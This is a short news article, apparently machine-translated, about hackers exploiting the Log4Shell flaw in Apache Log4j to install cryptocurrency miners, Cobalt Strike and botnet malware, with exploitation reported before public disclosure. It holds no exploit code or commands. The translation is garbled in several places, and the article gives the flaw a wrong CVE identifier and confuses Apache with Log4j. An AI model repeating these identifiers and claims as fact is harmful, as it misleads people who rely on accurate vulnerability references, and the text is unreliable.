1.7 C
New York
Saturday, January 28, 2023

Don't miss

Apache Log4j’s Log4Shell flaw actively exploited by hackers

- Advertisement -

Hackers vigorously attack servers affected by the vulnerability « Log4Shell » recently identified in Log4j. They aim to integrate cryptocurrency miners via Cobalt Strike and connect the devices in a « botnet ». Telemetry highlighted an exploitation of the flaw, 9 days before even that it was not revealed in broad daylight on December 9.

log4shell apache log4j flaw exploited hacker

- Advertisement -

The security company Netlab commented on the case. Similar threats, such as Mirai and Muhstik (Tsunami), target vulnerable systems, she says. Indeed, Muhstik had detected a security breach criticism in Atlassian Confluence early September. These were type attacks DDoS (distributed denial of service) to render infected systems unusable.

A threat since early December

The Redmond-based tech giant says it has detected a plethora of malicious activity, including the installation of Cobalt Strike for the credentials theft, the deployment of cryptocurrency miners and theexfiltration from data des machines compromises.

“The first Log4j operation report dates from December 1 at 04:36 UTC. “

Matthew Prince, CEO de Cloudflare

- Advertisement -

This suggests that the flaw was already accessible, at least 9 days before its revelation to the general public. According to the Cisco Talos Intelligence Group report, there has already been hacker activity from the December 2.

How has the Log4Shell flaw exploited?

Most of the attacks observed by Microsoft, at present, are attempts to go through vulnerable systems. However, once an attacker controls an application, there are a myriad of goals that can be achieved.

Entitled ” CVE-2021-22448 “(CVSS score: 10.0), the flaw allows the execution of remote codes in Log4j. All the hacker had to do: send lines containing the malicious code that is logged by the version 2.0 at least Log4j.

The propagation is all the easier since Apache (open source) based on Java, is widely used in enterprises to record events and messages generated by applications. This allows hackers to upload code from a domain to a sensitive server and take control of it. Once in charge, they are capable of causing the worst havoc.

No specific target for this vulnerability. Hackers take an approach « spray-and-pray » to wreak havoc. Incidents like these illustrate how a single flaw, embedded in many software, can cause a chain reaction. Always remember it! Malware and other computer attacks start with a single line of text.


Source From: Fredzone

- Advertisement -

Latest Posts